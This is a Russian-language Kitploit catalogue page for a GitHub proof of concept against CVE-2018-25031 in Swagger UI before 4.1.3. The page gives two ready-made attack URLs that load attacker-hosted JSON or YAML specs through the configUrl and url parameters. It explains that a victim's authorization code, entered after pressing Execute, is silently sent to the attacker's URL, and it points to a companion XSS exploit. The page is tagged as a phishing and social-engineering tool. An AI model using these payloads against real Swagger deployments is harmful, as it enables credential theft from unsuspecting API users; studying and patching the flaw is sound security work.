Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
POC-CVE-2018-25031 — Эксплойт proof-of-concept для CVE-2018-25031 (XSS в Swagger UI), который извлекает коды авторизации через специально созданные параметры configUrl/url. | Kitploit
Инструменты/GitHubGitHub/geozin/poc-cve-2018-25031
Инструменты фишингаАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийСоциальная инженерия
GitHubgeozin/poc-cve-2018-25031

POC-CVE-2018-25031

Эксплойт proof-of-concept для CVE-2018-25031 (XSS в Swagger UI), который извлекает коды авторизации через специально созданные параметры configUrl/url.

Репозиторий
152 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-25031 - Swagger UI до версии 4.1.3

Простой POC (CVE-2018-25031), который заставляет жертву ввести код авторизации, который затем отправляется атакующему.
Вы можете использовать его совместно с XSS-уязвимостью https://github.com/VictorNS69/swagger-ui-xss

Необходимо найти параметр и указать правильный файл: для configUrl — JSON-файл, а для url — YAML-файл.

Пример:

root@kitploit:~
https://<URL>/?configUrl=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.json
https://<URL>/?url=https://raw.githubusercontent.com/geozin/POC-CVE-2018-25031/main/doc.yaml

Скриншот:


Когда жертва пытается использовать API, вводя код авторизации, и нажимает Execute, ей ничего не отобразится. Однако запрос с кодом авторизации будет отправлен на URL атакующего.

Ссылки:

https://nvd.nist.gov/vuln/detail/CVE-2018-25031
https://github.com/mathis2001/CVE-2018-25031

Скачать инструмент